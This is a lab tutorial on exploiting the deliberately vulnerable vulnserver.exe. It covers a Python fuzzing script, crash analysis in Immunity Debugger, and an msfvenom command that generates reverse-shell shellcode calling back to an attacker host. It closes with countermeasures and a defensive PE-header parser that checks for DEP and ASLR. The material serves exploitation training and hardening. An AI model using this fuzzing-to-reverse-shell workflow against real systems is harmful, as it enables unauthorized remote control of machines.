Windows-Based Buffer Overflow Attack

Overview

This document walks through the exploitation of an intentionally vulnerable Windows executable: a Python script fuzzes the service, the resulting crash is analyzed in a debugger, and shellcode is injected into the overflowed buffer.


1. Setting Up a Vulnerable Windows Application

We target vulnserver.exe, an intentionally vulnerable program written for exploitation practice. Download it from: https://github.com/stephenbradshaw/vulnserver

  • Run vulnserver.exe on a Windows VM.

  • Attach Immunity Debugger to monitor crashes.


2. Fuzzing with Python (fuzz.py)

import socket

target_ip = "192.168.1.100"  # Replace with your Windows VM's IP
target_port = 9999

buffer = b"A" * 1000  # Adjust the length between runs to find the size that crashes the service

# A context manager closes the socket even if the send fails, and the timeout
# keeps the script from hanging once the target has crashed.
with socket.create_connection((target_ip, target_port), timeout=5) as s:
    s.recv(1024)       # consume vulnserver's welcome banner
    s.sendall(buffer)  # sendall() writes the whole payload, unlike send()

print("Sent fuzzing payload.")

Run it:

python3 fuzz.py

3. Debugging the Crash

  • Attach Immunity Debugger to the running vulnserver.exe process before sending the payload.

  • Confirm control of EIP: the overwritten return address is what redirects execution flow.

  • Inject custom shellcode (e.g., a reverse shell).


4. Exploit Development

Once EIP overwrite is confirmed, generate shellcode using msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.200 LPORT=4444 -b "\x00\x0A" -f python

Modify the exploit to place the generated shellcode in the buffer and take control of execution.


5. Countermeasures

  • Enable DEP (Data Execution Prevention), which marks the stack non-executable so injected shellcode cannot run in place.

  • Enable ASLR (Address Space Layout Randomization), which randomizes load addresses so hard-coded return addresses no longer land where the exploit expects.

  • Compile with stack canaries, which detect an overwritten return address before the function returns.
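The first two countermeasures above are opt-in flags recorded in the PE optional header (DllCharacteristics), so a defender can check whether a given executable such as vulnserver.exe actually requests DEP (NX_COMPAT) and ASLR (DYNAMIC_BASE). The following parser is an added example, not part of the original write-up or the vulnserver project; it tests itself against a constructed minimal PE32 header, and stack canaries (/GS) are not signalled by this field so they are not checked here.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification
HIGH_ENTROPY_VA = 0x0020  # 64-bit ASLR with high-entropy addresses
DYNAMIC_BASE = 0x0040     # ASLR: image may be relocated at load time
NX_COMPAT = 0x0100        # DEP: image is compatible with a non-executable stack/heap
GUARD_CF = 0x4000         # Control Flow Guard


def dll_characteristics(pe: bytes) -> int:
    """Return the DllCharacteristics field from the raw bytes of a PE image."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)      # offset of "PE\0\0"
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    opt = e_lfanew + 4 + 20            # skip signature and 20-byte COFF file header
    (magic,) = struct.unpack_from("<H", pe, opt)
    if magic not in (0x10B, 0x20B):    # PE32 / PE32+
        raise ValueError(f"unknown optional header magic {magic:#x}")
    # DllCharacteristics sits at optional-header offset 70 for both PE32 and PE32+
    (flags,) = struct.unpack_from("<H", pe, opt + 70)
    return flags


def mitigation_report(pe: bytes) -> dict:
    """Map each header-level mitigation to whether the image opts in."""
    flags = dll_characteristics(pe)
    return {
        "DEP (NX_COMPAT)": bool(flags & NX_COMPAT),
        "ASLR (DYNAMIC_BASE)": bool(flags & DYNAMIC_BASE),
        "High-entropy ASLR": bool(flags & HIGH_ENTROPY_VA),
        "CFG": bool(flags & GUARD_CF),
    }


def build_sample_pe(dll_chars: int) -> bytes:
    """Constructed minimal PE32 header (not a real binary) for offline testing."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)  # e_lfanew -> 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)  # i386, 1 section
    opt = bytearray(224)                                 # PE32 optional header size
    struct.pack_into("<H", opt, 0, 0x10B)                # PE32 magic
    struct.pack_into("<H", opt, 70, dll_chars)
    return dos + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for label, chars in (("unprotected", 0), ("hardened", NX_COMPAT | DYNAMIC_BASE)):
        print(label, mitigation_report(build_sample_pe(chars)))
```

To audit a real binary, pass the file contents to mitigation_report(), e.g. mitigation_report(open("vulnserver.exe", "rb").read()); a report with DEP and ASLR both False means the image relies entirely on system-wide policy for those protections.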